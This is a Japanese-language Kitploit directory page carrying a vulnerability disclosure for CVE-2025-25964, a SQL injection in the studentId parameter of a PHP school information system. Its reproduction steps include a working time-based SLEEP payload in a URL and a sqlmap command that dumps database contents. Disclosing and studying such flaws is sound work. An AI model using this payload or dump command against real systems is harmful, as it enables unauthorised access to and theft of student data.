Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-25964 — School Information Management System v1.0で発見された重大なSQLインジェクションの脆弱性(CVE-2025-25964) | Kitploit
ツール/GitHubGitHub/sudo-sakib/cve-2025-25964
脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト論文と研究学習と教育データベースセキュリティ
GitHubsudo-sakib/cve-2025-25964

CVE-2025-25964

School Information Management System v1.0で発見された重大なSQLインジェクションの脆弱性(CVE-2025-25964)

リポジトリを見る
221年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-25964: School Information Management System v1.0 における SQL インジェクション

はじめに

今日のデジタル環境において、SQL インジェクション(SQLi)は、Web アプリケーションで見られる最も一般的かつ危険な脆弱性の 1 つであり続けています。このブログ記事では、Itsourcecode によって開発された School Information Management System v1.0 で発見された、重大な SQL インジェクションの脆弱性(CVE-2025-25964)について説明します。この脆弱性により、リモートの攻撃者がシステムを悪用し、機密情報が漏えいする可能性があります。

脆弱性の概要

CVE ID: CVE-2025-25964

脆弱性タイプ: SQL インジェクション(SQLi)

影響を受ける製品: Student Information Management System - v1.0

影響を受けるコンポーネント: /columbans/admin/modules/student/index.php の studentId パラメータ

攻撃タイプ: リモート

深刻度: 高

発見者: Sakib Shaikh

再現手順

影響を実証するには、次のステップバイステップの手順に従います。

  1. 脆弱なアプリケーションをセットアップする: ローカルサーバーに School Information Management System v1.0 をインストールして設定します。

  2. ログインする: Itsourcecode が提供する認証情報でログインします。

  3. 脆弱なエンドポイントにアクセスする:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207

  1. SQL インジェクションをテストするために SQL ペイロードを注入する:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))zKnT)

  1. アプリケーションの応答を確認する: ページの読み込みに 10 秒以上かかる場合、SQL インジェクションの脆弱性が確認されます。これは、バックエンドデータベースが注入された SQL クエリを実行していることを証明します。

  2. 自動悪用には SQLMap を使用する:

root@kitploit:~
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast

このコマンドは、システムからデータベース名、テーブル、機密情報を抽出しようとします。

根本原因の分析

この問題は、index.php ファイルの studentId パラメータにおける不適切な入力サニタイズによって発生します。攻撃者が studentId パラメータを悪意のある SQL ペイロードで改変すると、アプリケーションは適切な検証なしに入力を処理するため、SQL インジェクションが発生します。

参考情報

https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system/

https://owasp.org/www-community/attacks/SQL_Injection

ツールをダウンロード